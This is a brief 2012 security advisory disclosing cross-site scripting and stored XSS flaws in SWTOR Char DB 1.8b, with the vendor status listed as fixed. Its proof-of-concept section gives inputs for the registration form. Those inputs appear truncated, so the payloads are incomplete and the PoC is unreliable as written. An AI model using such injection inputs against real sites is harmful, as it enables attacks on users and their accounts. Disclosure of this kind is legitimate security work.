Advisory: Star Wars Old Republic - SWTOR Char DB 1.8b Multiple security vulnerabilities
Advisory ID: SSCHADV2012-009
Author: Stefan Schurtz
Affected Software: Successfully tested on Star Wars Old Republic - SWTOR Char DB 1.8b
Vendor URL: http://swtorphpdb.sourceforge.net/
Vendor Status: fixed
OSVDB ID: 80841, 80842
==========================
Vulnerability Description
==========================
SWTOR Char DB 1.8b is prone to multiple security vulnerabilities
==================
PoC-Exploit
==================
// XSS
http://[target]/swtor/user/register.php
Username:
Password: whatever
// Stored XSS
http://[target]/swtor/user/register.php
Username: 1-->1